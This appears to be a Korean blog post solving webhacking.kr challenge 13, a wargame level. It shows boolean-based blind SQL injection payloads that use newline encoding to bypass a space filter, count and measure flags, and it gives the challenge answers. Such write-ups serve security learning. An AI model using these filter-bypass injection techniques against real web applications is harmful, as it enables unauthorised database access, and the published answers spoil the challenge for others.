-
webhacking.kr 13번 [1000p]$ 웹 해킹 $/webhacking.kr 2019. 4. 9. 23:56
1을 제출해 보겠습니다.
0을 제출해 보겠습니다.
1은 참이고, 0은 거짓이기 때문에
참일때 result 1 이 나오고
거짓일때 result값이 안나옵니다.
다음 sql구문으로 flag의 개수를 알수 있습니다.
if(select count(flag) from prob13password in 1,1,0)
?no=if((select%0acount(flag)%0afrom%0aprob13password%0a)in1,1,0)
다음과 같이 입력해 보면…
Flag가 1개가 아닙니다..
if(select count(flag) from prob13password in 2,1,0)
?no=if((select%0acount(flag)%0afrom%0aprob13password%0a)in%0a(2),1,0)
를 넣어 봤습니다.
Flag는 2개 였네요
no=if((select(min(length(flag)))from(prob13password))in(4),1,2)
다음과 같은 sql문을 입력하면 password의 길이를 찾을수 있는데
파이썬 코드로 한번 보내 보겠습니다.
↑ 위의 사진은 이어져 있는 사진입니다.
결과 :
Flag는 2개 이고
짧은 것은 4단어, 긴 것은 20단어이다.
4단어는 : flag // 20단어는 : challenge13luckclear 이다.
'$ 웹 해킹 $ > webhacking.kr' 카테고리의 다른 글
webhacking.kr 15번 [50p] (0) 2019.04.09 webhacking.kr 14번 [100p] (0) 2019.04.09 webhacking.kr 11번 [300p] (0) 2019.04.09 webhacking.kr 10번 [250p] (0) 2019.04.09 webhacking.kr 9번 [900p] (0) 2019.04.09